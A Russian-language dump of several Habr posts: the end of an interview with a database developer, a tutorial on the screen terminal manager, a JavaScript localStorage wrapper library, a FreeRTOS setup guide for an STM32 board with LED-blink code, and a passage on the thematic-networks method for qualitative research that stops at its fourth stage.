Недавно прочитал одну научно-фантастическую книгу «Звезда Пандоры». Там есть такой super intelligence, с которым нужно взаимодействовать. Наверное, в Google тоже ее прочитали и поняли, что нужно делать с их голосовыми сервисами. Но пока мне не очень они нравятся. Поэтому все-таки vi. Каким таск-менеджером / issue-tracker’ом / репозиторием пользуетесь?
Полностью на Github, и это отвечает на все вопросы. Все планирование идет через него. А если какая-то особо сложная задача, мы описываем ее в Google Docs. Потом можно сконвертировать ее в wiki.
До этого мы были на Launchpad, от Canonical (это те же ребята что делают Ubuntu). Они сейчас его забросили. Но в своё время эта была удобная штука, только для Bazaar, а не Git: например, были такие интересные вещи, как blueprints. Какие инструменты, фреймворки вы используете для разработки?
Несколько разработчиков в команде используют Clion, кто-то использует Sublime. Кроме того, есть корпоративный Mail.Ru JIRA, Confluence. Пользуемся Travis CI, Concourse CI. До этого у нас был Buildbot.
Из инструментов для отладки производительности используем Google Perf, Intel VTune. Сложно утверждать, что мы используем только лучшие инструменты, скорее для каждого случая ищем что-то, что лучше всего подходит из доступного. Есть ли в вашей компании какие-то внутренние проекты, библиотеки и для чего они создавались?
У нас есть как успешные, так и неуспешные кейсы. В версии 1.7 мы делаем disk store. Он появился как внутренний проект, но оказался нерабочим. Пришлось все переписать.
А есть кейсы, которые просто выстреливают. Один из наших разработчиков сделал библиотеку по функциональном программированию на Lua. Она хорошо работает с LuaJIT, все примитивы функционального программирования поддерживает. Она стала независимым проектом, у нее очень много поклонников.
Еще мы сделали набор инструментов, чтобы в Travis автоматически билдить пакеты. Эта штука называется PackPack . Очень удобно, что в Github ее можно можно подключить к проекту одной строчкой.
Кроме того, мы пользуемся Package Cloud: этот сервис берет на себя функцию хостинга репозиториев. У них open source план скромный, но вообще, если бы мы могли хранить все свои пакеты в этом облаке, было бы здорово. Но пока это очень дорого стоит. A Travis CI нас как open source проект поддерживает бесплатно. Что вас раздражает больше всего, когда вы работаете?
Я очень эмоциональный человек, и любая вещь, которая не получается, будет меня очень сильно заводить. Если говорить о работе – многое раздражает.
Я как человек все больше сталкиваюсь со своими личными ограничениями. Это меня очень сильно расстраивает. Какую профессиональную литературу вы бы могли порекомендовать?
Есть такая штука – Library Thing. Это сайт, на котором можно размещать прочитанные книги и ревью на них. У меня есть там аккаунт. Можно сходить туда и увидеть, что я прочитал в последнее время .
Сейчас я в основном читаю про менеджмент в ИТ. По поводу Computer Science… есть много новых алгоритмов, которые раньше мы не проходили в университете. Есть, например, Randomized Algorithms (1995) by Rajeev Motwani.
Если говорить о классике, есть джентльменский набор – например, Introduction to Algorithms , 3rd Edition (MIT Press) by Thomas H. Cormen и другие.
По компиляторам – Compilers: Principles, Techniques, and Tools (2nd Edition) by Alfred V. Aho и Engineering a Compiler (Second Edition) by Keith Cooper.
По базам данных – это книжка Ульмана, Гарсия-Малина… Достаточно интересная книжка. Что предпочитаете: электронные читалки или бумажные книги?
У меня есть Kindle. Пару раз я топил Kindle в бассейне, луже — я достаточно активно им пользовался. Но это не замена деревянным книжкам. Сейчас бывает так, что книги нет в электронном виде, а я люблю книги, проверенные временем. Если книга есть в pdf, или это что-то новое, читаю в Kindle. Какую технику (компьютеры, планшеты, смартфоны) и операционные системы вы предпочитаете на работе и дома?
У меня Linux и дома, и на работе. Ubuntu 16. В целом мне от Linux ничего не нужно. Мне хватило бы и 10-летней давности. Меня бы устроил терминал и браузер.
Бесит Open Office: приходится делать много слайдов в нем. Это проект за всю свою историю так и не стал стабильным. Вот сегодня, например, копипаст одного слайда у меня занимал несколько секунд.
В плане мобильных устройств я выбрал Android. У меня телефон Lenovo с огромной тяжелой батарейкой. Вы слушаете музыку, когда работаете?
Раньше было негативное отношение к музыке во время работы, но работа в офисе это изменила. Теперь постоянно слушаю в фоне chillstep, trip-hop, Аквариум (БГ). Какой лайфхак позволяет вам быть эффективнее?
Главный прием – нужно постоянно «тюнить» свои привычки. Нужно постоянно искать неэффективные привычки и их выжигать.
Допустим, ты тупишь в Facebook. Надо понять почему. Меня в эту сеть притащил Марк Кэлэхен. Он пишет там крутые статьи, его надо обязательно читать. Так я оказался в Facebook. Но всё лишнее время, проведенное там, я выжигаю огнем. Без каких приложений и сервисов не можете обойтись ни в работе, ни в личной жизни?
Я пользуюсь сервисами такси — обычно это Uber. Это кардинально поменяло мою жизнь, потому что по-другому планируешь свой день. Еще хочу, чтобы было такси без шоферов. Тогда оно стоило бы еще дешевле и можно было бы не иметь своей машины вообще. Ещё пользуюсь картами, конечно. Чаще всего это maps.me. У вас пройден огромный путь. А кто-то сейчас стоит в начале этого пути. Что бы вы порекомендовали человеку, пытающемуся пройти тот же путь?
Если бы я был самим собой 20 лет назад, и услышал бы себя сейчас, то скорее всего не понял бы. Такие люди, как Стив Джобс, говорят очень крутые вещи, гораздо лучше меня: «Оставайтесь голодными, старайтесь добиться большего». Надо только уметь их правильно понять. | https://habrahabr.ru/post/317584/ |
habrahabr | Консоль в массы. Переход на светлую сторону. Часть первая | ['bash', 'screen', 'tmux', 'wsd', 'front-end разработка', 'terminal'] |
Вступление
Всем привет! Данная серия статей — это текстовый вариант моего доклада на WSD в Киеве 26 ноября. Решил написать, чтобы дать более развернутое описание темам, которые были затронуты,... | Вступление
Всем привет! Данная серия статей — это текстовый вариант моего доклада на WSD в Киеве 26 ноября . Решил написать, чтобы дать более развернутое описание темам, которые были затронуты, а некоторые моменты уточнить. Кроме того, есть возможность рассмотреть больше примеров, услышать мнение от тебя, уважаемый читатель. И, конечно же, поделиться информацией с более широкой аудиторией. План побега Менеджеры терминалов. Часть первая
Менеджеры терминалов. Часть вторая
Скрипты на bash
Автоматизация рутинных задач
Важный момент. Предполагается, что читатель уже имеет опыт работы с терминалом на *nix OS. В примерах используется много утилит, таких как grep, find, xargs, echo, sed , и другие. На этих утилитах я не буду останавливаться подробно. Также нет задачи рассмотреть все и вся.
У нас большая команда и я часто вижу как одну и ту же задачу люди выполняют по-разному. Это также касается и работы в терминале. Знакомьтесь — это IE6.
Представьте себе ситуацию, что ваш любимый браузер не умеет работать с вкладками. Более того, когда он закрывается в самый неподходящий момент, вы не можете восстановить сессию и продолжить работу.
А вот так большинство пользователей представляют себе терминал. Черный экран, белые символы.
А теперь представьте, что в ваш любимый браузер добавили возможность работать в терминале. В нем вы можете выполнять команды git, npm, node и многие другие. Звучит как что-то нереальное из будущего. А вот и нет.
И в этой серии статей я хочу показать, что терминал может быть удобным и многофункциональным, только нужно знать как это все приготовить.
И так, приступим. Какие темы рассмотрим? Рассмотрим менеджеры терминалов. Потом скрипты на bash. И последнее, это как автоматизировать рутину с помощью скриптов на bash. Репозиторий
Для удобства я создал репозиторий на github со всеми примерами и темами, которые будем рассматривать на протяжении всей серии статей. Так что можно скачать и попрактиковаться. Слайды
Доступны по этой ссылке . Презентация сделана на движке shower . Где это все работает
Это все работает на Windows 10 stable , Mac OS X, Ubuntu . Предпочтение отдается Ubuntu. Все примеры я буду показывать в Ubuntu. Также есть классный эмулятор терминала — это ConEmu . Правда, в нем не получится попробовать менеджеры терминалов. Менеджеры терминалов. Часть первая. Screen
Начнем со screen’а. Познакомился я с ним совершенно случайно. Коллега помогал мне в решении одной задачи. И он увидел, что я не пользуюсь менеджером терминалов. Тогда он сказал: «Хм, давай поправим это.» Установил мне screen, помог настроить и показал парочку базовых сочетаний клавиш. Установка
Чтобы установить screen достаточно выполнить первую команду. После этого можно будет его запустить, набрав команду screen в терминале. Базовые сочетания клавиш
Почему я не выводил весь список в статью, а добавил ссылку ?! Все просто. Во-первых, они есть в мануале ( man screen ). Во-вторых, их не нужно учить, запоминать или еще что-то там, просто нужно начать использовать. Настройки
По умолчанию screen настроен не очень удобно. У него даже нет строки состояния. Выводится сообщение о лицензии и еще некоторые неудобства. Все это можно поправить с помощью файла конфигураций. Разместить его нужно в домашней директории пользователя. screen в деле
Давайте рассмотрим screen в работе. Как его запустить мы уже знаем. Достаточно набрать screen. Перед этим не забудьте поместить файл настроек в домашнюю директорию пользователя. Рабочая область. Layout.
Строка состояния. На ней размещаются вкладки и другие элементы.
Вкладка с именем по умолчанию.
Мы рассмотрели начальное состояние screen’а. Давайте теперь рассмотрим его на примере более сложной задачи.
Для этого нам понадобится репозиторий, о котором я упоминал выше. Давайте его склонируем себе на компьютер: git clone https://github.com/var-bin/terminalForCoder__WSD.git
Далее запустите screen. Нам понадобится 2 — 3 вкладки. Чтобы создать новую вкладку нужно нажать следующие сочетания клавиш: Ctrl + a, c - создать новую вкладку
Следующим шагом будет переименование вкладок. Для этого используйте: Ctrl + a, A - переименовать вкладку
Чтобы переключаться между вкладками воспользуйтесь этими клавишами: Ctrl + a, int - переключиться на нужную вкладку (int - номер вкладки 0 - 9)
Или Ctrl + a, " - интерактивное переключение вкладок
С вкладками немного попрактиковались. Теперь давайте разобьем наш текущий регион на два независимых региона. Делается это с помощью сочетания клавиш: Ctrl + a, | - разбить текущий регион на два новых по вертикали
Чтобы во втором регионе была возможность работать, в него нужно перейти и активировать явно. Сделать это можно с помощью: Ctrl + a, Tab - переключить фокус на следующий регион
Ctrl + a, c - создать новую вкладку
Теперь давайте запустим в том регионе, что слева, к примеру, midnight commander (любую другую утилиту) с помощью команды: mc
А в том регионе, что справа, запустим наше тестовое приложение. Это простой чат, написанный на node.js и socket.io . Этот пример взят с официального сайта socket.io. Единственное, что я добавил — это немного логирования, чтобы мы видели что оно работает. Для этого нужно перейти в директорию %repoName%/screen/chat-example . И выполнить команды: npm i
node index.js
%repoName% — имя директории в которую был склонирован репозитой.
Если все хорошо, то вы должны увидеть на экране строку: listening on localhost:3000
После этого запустите браузер и в новой вкладке перейдите по адресу localhost:3000 . Наберите любое сообщение в строке ввода и нажмите Enter . Как видите, все работает и вы видите это сообщение также и в терминале. В том регионе, где выполняли команду node index.js .
И теперь, самое интересное. Давайте сымитируем обрыв связи. Закроем терминал через крестик. Но при этом не закрывайте браузер. И попробуйте отправить еще несколько сообщений. Как видите, все продолжает работать. Это при том, что мы только что закрыли терминал.
Это говорит о том, что screen сохранил сессию и все процессы, которые были запущены. Давайте подключимся к этой сессии обратно. Запустите терминал и выполните команду: screen -r
Как вы могли заметить, тот layout, который мы создавали раньше, он не сохранился. Это довольно неприятный сюрприз. В настройках screen’a есть команды, которые позволяют настроить сохранение ранее созданного layout’а. Но сколько я не пробовал у меня не завелось. И это ситуация когда у нас две-три вкладки. А представьте себе картину, когда у нас шесть-десять вкладок. Layout разбит на регионы как по вертикали так и по горизонтали. И в самый неподходящий момент у нас происходит обрыв связи. Единственный плюс — это то, что все запущенные процессы сохранятся.
Я долгое время работал без менеджеров терминалов по одной простой причине. Я о них не знал! Считал, что это нормально открывать несколько окон putty (windows + подключение к удаленному серверу) и переключаться между ними с помощью сочетания клавиш Alt + Tab . И как-то пытаться во всем этом хаосе работать.
Теперь о плохом. screen не умеет создавать layout для каждой вкладки. Также screen не умеет сохранять layout, если оборвалась связь или еще что-то там. До версии 4.1 не умел делать разбивку по вертикали (для меня это критично). Когда вы создаете новый регион, то в нем отдельно нужно создавать новое окно ( Ctrl+a, c ), выполнить переход в нужную директорию и т.д. Чтобы удалить регион тоже нужно помучиться Ctrl+a :remove . Для меня screen был как глоток свежего воздуха посреди мегаполиса. Но чтобы его настроить «под себя», нужно потратить немало времени. И некоторые хотелки так и не получилось запилить в виду ограниченности реализации screen.
Подведем краткий итог. Мы рассмотрели один из популярных менеджеров терминалов, а именно screen. Также мы рассмотрели как его установить, настроить. На примере рассмотрели screen в работе. Еще раз хочу напомнить: если нужно посмотреть какие сочетания клавиш за что отвечают, какие настройки можно еще задать для screen’а, какие можно передавать опции в качестве аргументов screen’у, и многое другое, то выполните команду: man screen
Забегая немного наперед, в следующей статье мы рассмотрим более продвинутый менеджер терминалов, а именно tmux. Также сравним screen и tmux.
На этом все. Спасибо за внимание. Кто дочитал до конца отдельное спасибо. До встречи в следующей статье. | https://habrahabr.ru/post/317534/ |
habrahabr | Pабота с localstorage: подписка на события, хранение функций, массивов и объектов | ['javascript', 'localstorage', 'html5'] | LocalStorage это локальное хранилище данных (key, value), расположенное на клиенте. Данные хранятся до того пока пользователь не очистит их принудительно (историю броузера) или с помощью... | LocalStorage это локальное хранилище данных (key, value), расположенное на клиенте. Данные хранятся до того пока пользователь не очистит их принудительно (историю броузера) или с помощью JavaScript.
Работа с localStorage достаточна проста, данные хранятся в виде строк: // Сохранение значения
localStorage.setItem(key, value)
localStorage[key] = value
// Получение значения
localStorage.getItem(key)
localStorage[key]
// Удаление значения
localStorage.removeItem(key)
delete localStorage[key]
// Очистка всего хранилища
localStorage.clear()
Самое интересное здесь событие window storage , которое генерируется при изменении значения элемента localStorage. window.addEventListener('storage', function(events) {
console.dir(events);
});
StorageEvent вызывается каждый раз, когда произошло изменение в localStorage. Это не работает на странице, которая вносит изменения, но срабатывает на открытых страницах домена в броузере. То есть, данное событие оповещает открытые вкладки одного сайта о произошедшем событии.
В целях изучения данной технологии мной был написан небольшой скрипт для демонстрации работы localStorage с вкладками броузера.
Попутно, для удобства, был добавлен функционал позволяющий расширить localStorage, хранить и извлекать из localStorage типы значений Null, Date, Number, Boolean, Function
Использование: <script src="storage.js"></script>
Варианты установки значений _storage('name', 'Ivan');
_storage('test', [1, 2, 3]);
_storage('obj', {van: 1, two: 2});
_storage('mydate', new Date);
_storage('fn', function(){
alert('Hi');
};
var storage = _storage();
storage.set('name', 'Ivan');
storage
.set('test', [1, 2, 3])
.set('mydate', new Date)
.set('obj', {van: 1, two: 2});
Варианты получения значений: console.log(_storage('name')); // Ivan
console.dir(_storage('test')); // [1, 2, 3] type: [object Array]
console.dir(_storage('mydate')); // type: [object Date];
console.dir(_storage('fn')); // type: [object Function]
console.dir(_storage('obj')); // type: [object Object]
var storage = _storage();
alert(storage.get('name'));
_storage('fn')(); // call function
storage.get('fn')(); // call function
Подписаться на изменение значения: _storage().subscribe('message', function (value, e) {
// value - new value
// e - event object
});
var storage = _storage();
storage.subscribe('message', function (value, e) {
// value - new value
// e - event object
}).subscribe('fn', function (fn, e) {
fn(); //call function
// fn - new value
// e - event object
});
Проще один раз увидеть: git clone https://github.com/Poznakomlus/localstorage.git
cd localstorage
npm install
node run.js
При этом у нас запустится сервер по адресу http://127.0.0.1:7777 и в браузере откроются две страницы этого сервера (Sender, Recipient) для подробной демонстрации описанного. Вы сможете передавать данные из страницы Sender странице Recipient.
Пользуйтесь на здоровье. | https://habrahabr.ru/post/317586/ |
habrahabr | Установка FreeRTOS для Stm32vlDiscovery | ['stm32vldiscovery', 'freertos'] | Доброго времени суток.
Разбираясь с программированием микроконтроллеров Stm32, решил попробовать установить (операционную систему реального времени) ОСРВ — FreeRTOS и столкнулся с рядом... | Доброго времени суток.
Разбираясь с программированием микроконтроллеров Stm32, решил попробовать установить (операционную систему реального времени) ОСРВ — FreeRTOS и столкнулся с рядом трудностей. В интернете есть множество статей, но внятной инструкции я не нашёл, поэтому всех заинтересовавшихся прошу под кат.
Итак для начала определимся что необходимо иметь: Отладочная плата Stm32VLDiscovery
Установленную IDE Keil ARM 5 и выше
Желание раразбираться в новом
Если вы уже разрабатывали что-либо для семейства STM32F1x в Keil, то можете пропустить этот абзац. Для начала необходимо установить пакеты для разработки для семейства STM32F1x, это делается следующим образом: Запускаем Keil.
Нажимаем на кнопку Pack Installer в панели
В открывшемся окне нажимаем кнопку Check For Updates (ждём обновления списка пакетов)
Выбираем в дереве STMicroelectronics->STM32F1 Series->STM32F100 и устанавливаем все пакеты
На этом подготовка среды разработки закончена.
Переходим непосредственно к созданию проекта с использованием FreeRTOS.
Первое что необходимо сделать это скачать свежий дистрибутив ОСРВ с официального сайта www.freertos.org , на момент написания статьи последней версией была FreeRTOSv9.0.0. Итак мы получили внушительный архив, распаковываем его в любое место (сразу скажу что 99% из него нам не понадобится, так что не пугайтесь рамера получившейся папки у меня более 200 Мб).
Теперь нам необходимо создать новый проект в Keil.
Я назвал его FreeRTOSDemo, вы можете выбрать любое подходящее название, главное чтобы в пути размещения проекта не было пробелов и русских букв.
Теперь нам необходимо выбрать наш чип, я тестировал на отладочной плате STM32VLDiscovery c чипом STM32F100RB соответственно выбирал именно его.
После выбора чипа, необходимо выбрать библиотеки которые мы будем использовать. Нам понадобится библиотека CMSIS и StdPeriph. На рисунках далее показан минимальный выбор компонентов, чтобы проверить работу ОСРВ и помигать диодиками (это касается библиотеки StdPeriph, CMSIS нужна обязательно).
Итак мы создали проект, он выглядит следующим образом:
Далее для удобства в проекте создаем несколько групп, чтобы в последствии не получилась мешанина из файлов.
Всё готово к копированию файлов ОСРВ в проект. Создадим папку FreeRTOS в папке проекта.
Из папки FreeRTOSv9.0.0\FreeRTOS\Source\ копируем все *.с файлы в созданную папку FreeRTOS. Туда же копируем папку include.
Из папки FreeRTOSv9.0.0\FreeRTOS\Source\portable\RVDS\ARM_CM3\ копируем файлы *.с и *.h в соответвующие им места папки FreeRTOS нашего проекта.
Из папки FreeRTOSv9.0.0\FreeRTOS\Source\portable\MemMang\ копируем файл heap_2.c.
Из папки FreeRTOSv9.0.0\FreeRTOS\Demo\CORTEX_STM32F103_Keil\ копируем файл FreeRTOSConfig.h.
После всех манипуляций должно получится следующее:
Далее нам необходимо добавить файлы в соответствующие группы в проекте, а также создать файл main.c c основным текстом программы.
В итоге должна получится следующая структура проекта.
Для того чтобы проект компилировался в его настройках необходимо указать все пути к *.h файлам, а также прописать дерективу USE_STDPERIPH_DRIVER.
Теперь осталось изменить несколько строк в файле FreeRTOSConfig.h, для корректной работы: #define configCPU_CLOCK_HZ ( ( unsigned long ) 72000000 ) /*на*/
#define configCPU_CLOCK_HZ ( ( unsigned long ) 24000000 )
#define configTOTAL_HEAP_SIZE ( ( size_t ) ( 17 * 1024 ) ) /*на*/
#define configTOTAL_HEAP_SIZE ( ( size_t ) ( 5 * 1024 ) )
И добавляем следующие строки после #define FREERTOS_CONFIG_H #define xPortSysTickHandler SysTick_Handler
#define xPortPendSVHandler PendSV_Handler
#define vPortSVCHandler SVC_Handler
После этого в файле main.c пишем простейшую программу для мигания светодиодами. #include "FreeRTOS.h"
#include "task.h"
#include "queue.h"
#include "stm32f10x.h"
#include "stm32f10x_gpio.h"
#include "stm32f10x_rcc.h"
GPIO_InitTypeDef port;
uint8_t state;
void vFreeRTOSInitAll()
{
RCC_APB2PeriphClockCmd(RCC_APB2Periph_GPIOC, ENABLE);
GPIO_StructInit(&port);
port.GPIO_Mode = GPIO_Mode_Out_PP;
port.GPIO_Pin = GPIO_Pin_9|GPIO_Pin_8;
port.GPIO_Speed = GPIO_Speed_50MHz;
GPIO_Init(GPIOC, &port);
}
void vLedTask (void *pvParameters)
{
while(1)
{
if (state == 0)
{
GPIO_SetBits(GPIOC,GPIO_Pin_9);
GPIO_ResetBits(GPIOC,GPIO_Pin_8);
state = 1;
vTaskDelay(500);
}
else
{
GPIO_ResetBits(GPIOC,GPIO_Pin_9);
GPIO_SetBits(GPIOC,GPIO_Pin_8);
state = 0;
vTaskDelay(500);
}
}
vTaskDelete(NULL);
}
int main(void)
{
vFreeRTOSInitAll();
xTaskCreate(vLedTask,(signed char*)"LedTask", configMINIMAL_STACK_SIZE,
NULL, tskIDLE_PRIORITY + 1, NULL);
vTaskStartScheduler();
}
Теперь можно собрать проект и залить прошивку в микроконтроллер, после перезагрузки наблюдать мигающие светодиоды. | https://geektimes.ru/post/283678/ |
habrahabr | Как хорошо подать результаты качественного исследования: метод тематических сетей (+ анализ ATS в качестве примера) | ['Качественные методы', 'качественные исследования', 'качественный анализ', 'исследование пользователей', 'оценка сотрудников', 'опрос', 'survey', 'метод тематических сетей', 'маркетинг', 'маркетинг игр', 'маркетинг приложений', 'UX', 'обратная связь', 'research', 'исследования', 'аналитика', 'социологические исследования', 'продуктовый дизайн', 'ATS', 'ERP', 'анализ данных', 'автоматизация рекрутинга', 'автоматизация бизнеса'] |
Большинство статей и выступлений про качественные исследования посвящены методам сбора информации. Но очарование качественных методов в маркетинговых и UX-исследованиях исчезает на этапе... |
Большинство статей и выступлений про качественные исследования посвящены методам сбора информации. Но очарование качественных методов в маркетинговых и UX-исследованиях исчезает на этапе анализа и представления результатов. Эту непростую задачу исследователи решают по-разному. Иногда ради быстрого результата, или по незнанию они нарушают методологию качественных исследований, отчего работа выглядит непрофессионально и не вызывает доверия.
В статье рассмотрим один из методов качественного анализа – Метод тематических сетей: — обсудим частые ошибки качественных исследований и вспомним «кальсонных гномов»;
— разберем пошаговый алгоритм метода и его возможные ловушки;
— применим метод к анализу ИТ-продукта и нарисуем тематическую карту. Статья будет интересна: — исследователям;
— менеджерам продуктов и маркетологам;
— тем, кто использует в работе результаты исследований;
— тем, кто давно искал удобный метод структурирования нецифровой информации. Статья продолжает тему исследований пользователей. В этот раз отступим от анкетного исследования ( статья 1 и статья 2 ), вернемся к анализу потребностей пользователей ( статья 3 ) и обсудим качественные методы обработки результатов исследования. За что исследователи любят качественные методы? За необязательную репрезентативность выборки, отсутствие статистики и прочую свободу действий. Свобода на деле оказывается мнимой, но заметить это можно, только если относиться к методологии качественных исследований всерьез. А без такого отношения и под влиянием устоявшейся ориентации на позитивизм качественные методы в бизнес-исследованиях становятся «ленивыми» количественными, которым будто разрешили «не быть такими строгими».
Чаще всего ошибки появляются на этапе выбора методологии и на этапе обработки и представления результатов. Выбору методологии исследований я планирую посвятить отдельные статьи. А вот две основные ошибки обработки результатов качественных исследований:
1. Результаты качественных исследований представляются, как в презентации «кальсонных гномов» из «Южного парка». Подробно обосновывается первый этап – качественный метод сбора данных, а потом, минуя обсуждение результатов, даются выводы и рекомендации. Такие отчеты не содержат промежуточные обобщенные данные, и вычисления исследователей остаются для заказчика в «черном ящике». Заказчики экономят время и, при большом доверии к исследователям, рады получить только итоговые выводы. Но если посмотреть, сколько информации теряется и искажается при такой интуитивной обработке, и заказчики, и исследователи не будут рады результатам.
2. Исследователи ссылаются на высказывания и действия участников исследования, распространяют результаты на всех пользователей и пытаются прогнозировать их поведение (это допустимо только для количественных методов). Иногда используется статистика: описательная (подсчет частот и средних, таблицы сопряженности) и индуктивная (корреляционный, факторный анализ и др.). Действительно, эти методы допустимо использовать при обработке качественных данных в социальных науках, но в маркетинговых исследованиях они не могут уберечь исследователя и заказчика от смещения внимания с качественных данных на количественные результаты, с понимания на предсказание.
Даже в отчетах опытных UX-исследователей встречается этот легкий переход от качественных методов сбора информации к их количественной интерпретации. При такой подаче результатов читатель интуитивно обобщает выводы, или подсчитывает проценты: «Из 6 участников UX-тестирования 3 не смогли найти кнопку заказа – Ясно. Половина наших пользователей до нас не доходит!», «60% пользователей (3 человека из 5) выбрали кнопку зеленого цвета. – Нужно менять палитру сайта, раз большинству нравится зеленый». В итоге получаются смехотворные результаты. «Не все, что важно, может быть измерено, не все, что может быть измерено, важно» (А. Эйнштейн).
Основной задачей качественных исследований остается описание феноменологии принятия решений пользователями и понимание их эмоций, мотивов и путей рассуждения (когниций, предубеждений, стереотипов, и т.д.), а не подсчет действий отдельных участников эксперимента. Значит, и метод анализа результатов качественного исследования принесет больше пользы, если будет сосредоточен на понимании, передаче смыслов и описании вариантов оценки ситуации пользователем, а не на подсчете проделанных им операций. Метод тематических сетей (Thematic networks) – это метод упорядочивания результатов качественного исследования. Основная цель тематического анализа – выделение основных тем, содержащихся в качественных данных, их группировка и отображение, удобное для понимания исследователю и читателю (заказчику исследования). Результатом таких группировок становится паутиноподобная сеть, в которой отражаются все выделенные темы и связи между ними.
Так выглядит классическая структура тематической сети.
Нельзя однозначно отследить отделение тематического анализа, как самостоятельного метода, так как этапы, принципы и общая структура угадываются и в других качественных методах (например, методе обоснованной теории, качественного анализа и других). Так что, метод тематических сетей – не принципиально новый. Но его применение обосновано, удобно и легко автоматизируется в программах для качественных исследований, так называемых Computer Assisted/Aided Qualitative Data AnalysiS (CAQDAS). Например, в программе ATLAS.ti.
Важно, что в цели тематического анализа не входит определение причин аргументации. Анализ тематических сетей не подразумевает также подсчет частоты встречаемости разных тем, или их комбинаторику. Хотя частая встречаемость темы в текстах считается положительным обстоятельством, даже при одном упоминании темы в одном тексте, она включается в анализ на общих правах. Основная задача тематического анализа – разбиение текстов на осмысленные отрезки и выделение в них «рационализаций» (когнитивных схем, интерпретаций, обоснований, возражений и др.). Другими словами, все найденные темы, независимо от частоты их появления в текстах и авторства, одинаково важны для анализа.
Метод тематических сетей подходит для работы с самыми разными данными:
Метод тематических сетей хорошо проявляет себя, когда исследователь встречается с неожиданными, или скрытыми паттернами мышления (неосознаваемыми предубеждениями, тайными желаниями, и др.). В таком анализе удается не только выделить основных «когнитивных игроков», но и дать им интерпретацию и даже описать их типичные маски в обыденной речи, или поведении пользователей.
При обычном тестировании продукта, когда реакции пользователей, в основном, предсказуемы и ожидаемы , метод тематических сетей не приносит новых открытий, но помогает доказать и качественно структурировать основные темы, чтобы потом на их основе наметить конкретные действия по доработке, или продвижению продукта. Надежность метода тематических сетей находится под постоянным вниманием критиков, так как во многом зависит от опыта и выбранной стратегии кодировщика, проводящего анализ. Чтобы повысить надежность метода, рекомендуется параллельно обрабатывать данные нескольким кодировщикам. Если этого не удается достичь, исследователю рекомендуется регулярно возвращаться к оригинальным текстам и сравнивать их с выделенными кодами и темами.
Для удобства рассмотрим использование метода на примере анализа текста. Аналогично его можно применять к другим видам данных. Этапы применения метода тематических сетей Этап 1: Кодирование.
На этом этапе в тексте выделяются осмысленные текстовые фрагменты. Каждый из них кодируется. Что нужно делать Шаг 1. Исследователь просматривает тексты и записывает в отдельном документе названия кодов и их расшифровки. Позже эта система кодирования будет применена для обработки текстов. Как подбираются коды Способы кодирования, в общем, сводятся к следующим: ⎯ система кодов выбирается на основе заранее заданных теоретических предпосылок (дедуктивный путь, «theory-driven» исследование);
⎯ система кодов выбирается на основе значимых тем, появляющихся в тексте (индуктивный путь, «data-driven» исследование);
⎯ сочетаются оба подхода. Выбранные коды могут быть заданными понятиями, взятыми из гипотез исследования, фрагментами обыденной речи участников исследования, неологизмами, или сленгом. Шаг 2. Исследователь разбивает текст на осмысленные участки (абзацы, предложения, фразы, слова) и присваивает им коды.
В итоге такой работы все тексты разбиваются на коды. При применении сервисов автоматизации на этом этапе каждый выделенный фрагмент текста заменяется кодом. Этот этап позволяет проверить, все ли темы в оригинальных текстах охвачены кодами, и все ли коды точно подходят к заменяемым отрезкам текста. Где можно ошибиться На этом этапе важен принцип «необходимости и достаточности». С одной стороны, коды должны быть четко определены, чтобы избежать смешения понятий и пересечения области значений нескольких кодов. С другой стороны, количество кодов должно быть ограниченным и обоснованным, чтобы исследователь не поддался соблазну присвоить код каждому новому предложению.
Также не забывайте записывать для каждого кода расшифровку. Вначале кажется, что все коды можно удержать в памяти, но позже могут возникнуть курьезные ситуации, когда придется переделывать работу. Этап 2. Определение тем. На этом этапе в текстах выделяются базовые темы. Что нужно делать Шаг 3. Исследователь просматривает коды и выделяет среди них наиболее значимые, объединяющие, или выдающиеся темы. Близкие по смыслу коды группируются в темы. Шаг 4. Исследователь просматривает темы и «очищает» их, чтобы избежать повторов и сделать темы достаточно широкими, способными включить несколько кодов. В итоге, каждая тема должна быть довольно узкой, чтобы точно передавать определенную идею и не пересекаться с другими темами, но и достаточно широкой, чтобы обобщать разные высказывания и формулировки в этой смысловой области.
Удобно работать, если тем начального уровня анализа получается не больше 16. В то же время, хорошо, если их не очень мало: с 2-3 темами тематическая карта не получится интересной и содержательной. Где можно ошибиться Это этап обобщения информации, но это не значит, что на нем необходимо группировать все коды. Если в тексте выделились коды, которые нельзя сгруппировать, и которые представляют значимость для исследования, таким кодам присваиваются собственные темы. Однако, на практике обычно удается сгруппировать и обобщить в темы несколько кодов. Этап 3. Конструирование тематической сети. На этом этапе рисуется тематическая сеть – графическая основа метода. Что нужно делать Шаг 5. Исследователь группирует и упорядочивает по смыслу базовые темы. Порядок задается контентом, или предварительными теоретическими основаниями исследования. Темы можно переименовать, чтобы внутри одной группы они представляли однородные и легко считываемые элементы. Шаг 6. Исследователь организует близкие по смыслу базовые темы и обобщает их под одной общей «организующей» темой. Название этой темы содержит обобщение для всей группы входящих в нее тем. Оно должно быть достаточно говорящим и считываемым с первого взгляда. Шаг 7. Исследователь объединяет близкие организующие темы под общими «глобальными» темами. Глобальные темы обычно включают по 2-3 организующие темы и становится финальной обобщающей частью тематической сети. Поэтому их названия обычно метафоричны, они передают общий смысл объединенных ими тем.
Количество кодов, базовых, организующих и глобальных тем не предписано правилами. Оно задается разнообразием собранного материала и аналитической работой исследователя. Но обычно в работах встречается до 3-х глобальных тем (чаще всего 1-2), по 2-3 организующие темы для каждой глобальной и по 2-3 базовые темы для каждой организующей темы. Шаг 8. Как только произошли все обобщения и темы получили «говорящие» названия, настает время визуализации. Она делается просто, с соблюдением 2 важных принципов: 1) в центре сети размещается глобальная тема, от которой отходят организующие и – далее – базовые темы; 2) расположение тем одной группы не должно быть иерархичным, они все располагаются, как однородные равноценные элементы сети. Шаг 9. Когда сеть нарисована, исследователь возвращается к ее проверке и обновлению. На этом этапе исследователь открывает сырые тексты и удостоверяется, что каждый затронутый в тексте значимый аспект нашел адекватное отображение в сети и не исказился в процессе обобщения. Также проверяется, есть ли для каждой темы в сети эквивалент в сырых данных, цитатой из которого можно при необходимости проиллюстрировать тему. Где можно ошибиться
Выбор названий для организующих и глобальных тем – довольно сложная задача. Названия должны быть говорящими, не искажать смысл объединенных тем и находить соответствия в сырых данных. На этапе обобщения велика опасность смещения акцентов и добавления личных смыслов от исследователя. Поэтому, рекомендуется выполнить эту работу нескольким исследователям независимо и потом сравнить результаты, или одному исследователю несколько раз перепроверить выделенные темы. Этап 4. Описание и объяснение тематической сети.
